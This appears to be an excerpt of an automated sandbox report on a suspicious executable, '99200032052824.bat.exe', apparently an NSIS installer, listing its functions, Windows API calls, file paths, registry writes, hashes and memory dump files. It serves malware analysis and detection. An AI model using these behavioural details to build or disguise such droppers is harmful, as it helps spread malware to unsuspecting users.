C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
"C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00402D63
Null, xrefs: 00402E5A
Error launching installer, xrefs: 00402DB3
soft, xrefs: 00402E51
Inst, xrefs: 00402E48

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\99200032052824.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-116366952
Opcode ID: 6ee9e3ff3a5801a07d03cefed85b7338ced45a2f22c8cd65c9238745d7b7497e
Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
Opcode Fuzzy Hash: 6ee9e3ff3a5801a07d03cefed85b7338ced45a2f22c8cd65c9238745d7b7497e
Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

Function 00405FC2 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060ED
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000), ref: 00406100
SHGetSpecialFolderLocation.SHELL32(004050FF,75A823A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000), ref: 0040613C
SHGetPathFromIDListA.SHELL32(75A823A0,Call), ref: 0040614A
CoTaskMemFree.OLE32(75A823A0), ref: 00406156
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,004050FF,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,00000000,0041C228,75A823A0), ref: 004061CC

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll, xrefs: 00405FE7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
Call, xrefs: 00405FEC, 004060B9, 004060BA, 004060BB, 004060D7, 004060EC, 004060FF, 0040611B, 00406146, 00406179, 0040617F, 00406197, 004061AA, 004061C5, 004061CB, 004061D3, 004061FD
Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-2516752540
Opcode ID: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
Opcode Fuzzy Hash: 6fb7d4b9e0176c72f21e117460eb3ab44bee62ba2a965ffc372a20c4b8672acd
Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Inquiring Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004050C7: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp, xrefs: 004017A3, 00401812, 00401830
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp$C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand$Call
API String ID: 1941528284-552088578
Opcode ID: 9b6bbad7b3b488530eb8da8d2fac4795b428d1f2831a164cb9dfb2029ea3a837
Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
Opcode Fuzzy Hash: 9b6bbad7b3b488530eb8da8d2fac4795b428d1f2831a164cb9dfb2029ea3a837
Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0), ref: 00405123
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405135
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll, xrefs: 004050E7, 004050F9, 004050FF, 00405122, 0040512E

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll
API String ID: 2531174081-1393834662
Opcode ID: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
Opcode Fuzzy Hash: df169b469795bd748155a1bed2d77fa091380b27c3cf4036283bd74b1758659f
Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

Function 00402F9C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403003
GetTickCount.KERNEL32 ref: 004030AA
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030D3
wsprintfA.USER32 ref: 004030E3

Strings

... %d%%, xrefs: 004030DD
(TA, xrefs: 00403059
(TA, xrefs: 0040315D

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: (TA$(TA$... %d%%
API String ID: 551687249-2950751476
Opcode ID: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
Opcode Fuzzy Hash: 9cc729fb03587e77d36b85ec2d3e28e988b6cfa12a4048dcf9b453659f184ac0
Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

Function 0040558D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
GetLastError.KERNEL32 ref: 004055E4
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
GetLastError.KERNEL32 ref: 00405603

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
C:\Users\user\Desktop, xrefs: 0040558D

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1700792911
Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9

Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
wsprintfA.USER32 ref: 0040631A
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E

Strings

%s%s.dll, xrefs: 00406314
UXTHEME, xrefs: 004062D3
\, xrefs: 004062F2

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

Function 00405B68 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B7C
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6B
nsa, xrefs: 00405B73
"C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00405B68

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1468284503
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

Function 73A316DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73A31A98: GlobalFree.KERNEL32(?), ref: 73A31CE7
Part of subcall function 73A31A98: GlobalFree.KERNEL32(?), ref: 73A31CEC
Part of subcall function 73A31A98: GlobalFree.KERNEL32(?), ref: 73A31CF1

GlobalFree.KERNEL32(00000000), ref: 73A31786
FreeLibrary.KERNEL32(?), ref: 73A31809
GlobalFree.KERNEL32(00000000), ref: 73A3182E

Part of subcall function 73A3226F: GlobalAlloc.KERNEL32(00000040,?), ref: 73A322A0

Part of subcall function 73A32672: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73A31757,00000000), ref: 73A32742

Part of subcall function 73A3156B: wsprintfA.USER32 ref: 73A31599

Strings

, xrefs: 73A3180F

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: fb28ec60967e004a718efb2c2e530ff9a31335b3962c64d1c08fc00b56ef01c2
Instruction ID: 3443b3db8ce747547400a12c0c38b6462c0bfa02d28fb297521bd9f0b579e7f5
Opcode Fuzzy Hash: fb28ec60967e004a718efb2c2e530ff9a31335b3962c64d1c08fc00b56ef01c2
Instruction Fuzzy Hash: 3B4164715043089BDB01BF64DE86B9537ACFF0B314F98846BE94B5A1DDDB788045CBA0

Function 004023D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000023,00000011,00000002), ref: 00402421
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 0040245E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp,00000000,00000011,00000002), ref: 00402542

Strings

C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp, xrefs: 00402412, 00402420, 00402434, 00402448, 00402453

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp
API String ID: 2655323295-1063250699
Opcode ID: 57d82d557112082bf27dcdaa3b3a6fb00c9060ac7b5473e8dd8cb218f70b9ac1
Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
Opcode Fuzzy Hash: 57d82d557112082bf27dcdaa3b3a6fb00c9060ac7b5473e8dd8cb218f70b9ac1
Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68

Function 00402003 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 0040202E

Part of subcall function 004050C7: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,004030F7,004030F7,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,00000000,0041C228,75A823A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B8

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

